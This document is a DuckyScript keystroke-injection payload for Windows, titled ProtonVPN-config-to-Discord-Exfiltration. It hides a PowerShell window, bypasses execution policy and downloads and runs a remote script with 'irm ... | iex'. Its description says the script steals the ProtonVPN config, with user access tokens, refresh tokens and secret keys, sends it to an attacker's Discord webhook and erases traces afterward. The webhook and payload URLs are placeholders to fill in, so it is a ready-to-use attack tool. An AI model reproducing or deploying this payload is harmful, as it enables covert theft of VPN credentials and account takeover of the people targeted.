1
REM ###################################################################
2
REM #                                                                 |
3
REM # Title        : ProtonVPN-config-to-Discord-Exfiltration         |
4
REM # Author       : Aleff                                            |
5
REM # Version      : 1.0                                              |
6
REM # Category     : Credentials, Exfiltration                        |
7
REM # Target       : Windows 10-11                                    |
8
REM #                                                                 |
9
REM ###################################################################
10

11
REM Title: ProtonVPN-config-to-Discord-Exfiltration
12
REM Author: Aleff
13
REM Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
14
REM              In the config file you can find a lot information about the user like:
15
REM              - UserUid 
16
REM              - UserAccessToken
17
REM              - UserRefreshToken
18
REM              - UserAuthenticationPublicKey
19
REM              - UserAuthenticationSecretKey
20
REM              - UserAuthenticationCertificatePem
21
REM              - UserCertificationServerPublicKey 
22
REM              - and so on...
23
REM              Then it cleans up traces of what you have done after.
24
REM Target: Windows 10-11 (PowerShell + ProtonVPN software)
25
REM Version: 1.0
26
REM Category: Credentials, Exfiltration
27
REM Requirements: ProtonVPN user logged at least one time and internet connection
28
REM 
29

30
REM REQUIRED - Provide your url WEBHOOK - https://discordapp.com/api/webhooks/<webhook_id>/<token>
31
DEFINE WEBHOOK example.com
32

33
DELAY 2000
34
GUI r
35
DELAY 250
36
DELETE
37
STRING powershell -w h -ep bypass $discord='
38
STRING WEBHOOK
39

40
REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
41
DEFINE PAYLOAD example.com
42
STRING ';irm PAYLOAD | iex
43
ENTER
44

45